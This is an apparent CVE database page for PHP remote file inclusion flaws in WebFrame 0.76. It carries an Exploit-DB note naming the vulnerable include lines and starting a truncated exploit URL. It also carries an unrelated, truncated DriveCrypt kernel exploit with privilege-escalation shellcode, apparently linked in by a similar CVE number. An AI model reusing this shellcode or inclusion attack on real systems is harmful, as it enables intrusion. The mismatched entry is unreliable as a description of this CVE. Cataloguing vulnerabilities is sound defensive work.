CVE-2009-0513
published 2009-02-11CVE-2009-0513: Multiple PHP remote file inclusion vulnerabilities in WebFrame 0.76 allow remote attackers to execute arbitrary PHP code via a URL in the classFiles parameter…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.10%
79.4th percentile
Multiple PHP remote file inclusion vulnerabilities in WebFrame 0.76 allow remote attackers to execute arbitrary PHP code via a URL in the classFiles parameter to (1) admin/doc/index.php, (2) index.php, and (3) base/menu.php in mod/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webframe | webframe | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM
exploitdb·2011-01-11
CVE-2011-0513 DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM
DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM
---
/* drivecrypt-dcr.c
*
* Copyright (c) 2009 by
*
* DriveCrypt
#include
#include
#include
#define DCR_IOCTL 0x00073800
static unsigned char win32_fixup[] =
"\x89\xe5"
"\x81\xc5\xb4\x0c\x00\x00";
/* Win2k3 SP1/2 - kernel EPROCESS token switcher
* by mu-b
*/
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"
/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"
Exploit-DB
webframe 0.76 - Multiple File Inclusions
exploitdb·2009-02-09
CVE-2009-0514 webframe 0.76 - Multiple File Inclusions
webframe 0.76 - Multiple File Inclusions
---
-----------------[-Rfi/Lfi-]-----------------
script:webframe 0.76
download from:http://downloads.sourceforge.net/phpwebframe/webframe-0.76-src.tar.gz?modtime=1155546760&big_mirror=0
........................................................
vul1: /mod/admin/doc/index.php line 3;
include_once "$classFiles/xml.php";
vul2:/mod/index.php line 5,7,9,11,13;
include_once "$classFiles/table.php";
//html class
include_once "$classFiles/html.php";
//Database class
include_once "$classFiles/mysql.php";
//Form class
include_once "$classFiles/form.php";
//Language file
include "../$currentmod/lang/$LANG.php"; ----> = lfi
vul3: /mod/base/menu.php line 17;
include_once "$classFiles/mysql.php
xpl rfi:
http://127.0..0.1/path/mod/admin/doc/index.php?cla
No writeups or analysis indexed.
2009-02-11
Published